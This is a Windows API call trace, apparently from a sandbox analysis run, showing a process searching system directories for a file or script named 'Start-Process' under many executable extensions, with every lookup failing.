	[0058.158] GetFullPathNameW (in: lpFileName="Start-Process.VBE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.VBE", lpFilePart=0x0) returned 0x2b
	[0058.158] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.VBE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.159] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.JS", lpFilePart=0x0) returned 0x24
	[0058.159] GetFullPathNameW (in: lpFileName="Start-Process.JS", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JS", lpFilePart=0x0) returned 0x2a
	[0058.159] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.JS", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.160] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.JSE", lpFilePart=0x0) returned 0x25
	[0058.160] GetFullPathNameW (in: lpFileName="Start-Process.JSE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.JSE", lpFilePart=0x0) returned 0x2b
	[0058.160] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.JSE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.WSF", lpFilePart=0x0) returned 0x25
	[0058.161] GetFullPathNameW (in: lpFileName="Start-Process.WSF", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSF", lpFilePart=0x0) returned 0x2b
	[0058.161] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.WSF", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.161] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.WSH", lpFilePart=0x0) returned 0x25
	[0058.162] GetFullPathNameW (in: lpFileName="Start-Process.WSH", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.WSH", lpFilePart=0x0) returned 0x2b
	[0058.162] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.WSH", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.MSC", lpFilePart=0x0) returned 0x25
	[0058.162] GetFullPathNameW (in: lpFileName="Start-Process.MSC", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.MSC", lpFilePart=0x0) returned 0x2b
	[0058.163] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.MSC", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process.CPL", lpFilePart=0x0) returned 0x25
	[0058.163] GetFullPathNameW (in: lpFileName="Start-Process.CPL", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.CPL", lpFilePart=0x0) returned 0x2b
	[0058.163] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process.CPL", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.164] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb7360118, ftLastAccessTime.dwHighDateTime=0x1d3a580, ftLastWriteTime.dwLowDateTime=0xb7360118, ftLastWriteTime.dwHighDateTime=0x1d3a580, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1
	[0058.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Process", lpFilePart=0x0) returned 0x21
	[0058.164] GetFullPathNameW (in: lpFileName="Start-Process", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process", lpFilePart=0x0) returned 0x27
	[0058.164] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Process", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.164] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.165] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.165] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.ps1", lpFilePart=0x0) returned 0x1c
	[0058.165] GetFullPathNameW (in: lpFileName="Start-Process.ps1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.ps1", lpFilePart=0x0) returned 0x2b
	[0058.165] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.ps1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.165] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.165] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.165] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.165] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.166] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.psm1", lpFilePart=0x0) returned 0x1d
	[0058.166] GetFullPathNameW (in: lpFileName="Start-Process.psm1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psm1", lpFilePart=0x0) returned 0x2c
	[0058.166] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.psm1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.166] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.166] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.166] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.psd1", lpFilePart=0x0) returned 0x1d
	[0058.167] GetFullPathNameW (in: lpFileName="Start-Process.psd1", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.psd1", lpFilePart=0x0) returned 0x2c
	[0058.167] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.psd1", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.167] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.167] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.167] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.COM", lpFilePart=0x0) returned 0x1c
	[0058.167] GetFullPathNameW (in: lpFileName="Start-Process.COM", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.COM", lpFilePart=0x0) returned 0x2b
	[0058.167] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.COM", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.168] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.168] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.168] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.EXE", lpFilePart=0x0) returned 0x1c
	[0058.168] GetFullPathNameW (in: lpFileName="Start-Process.EXE", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.EXE", lpFilePart=0x0) returned 0x2b
	[0058.168] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Process.EXE", lpFindFileData=0x184c18dc50 | out: lpFindFileData=0x184c18dc50) returned 0xffffffffffffffff
	[0058.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfd0) returned 1
	[0058.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df70) returned 1
	[0058.169] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df80) returned 1
	[0058.169] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18e060 | out: lpFileInformation=0x184c18e060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0058.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0058.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfb0) returned 1
	[0058.169] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0058.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Process.BAT", lpFilePart=0x0) returned 0x1c
	[0058.169] GetFullPathNameW (in: lpFileName="Start-Process.BAT", nBufferLength=0x105, lpBuffer=0x184c18da40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\Start-Process.BAT", lpFilePart=0x0) returned 0x2b
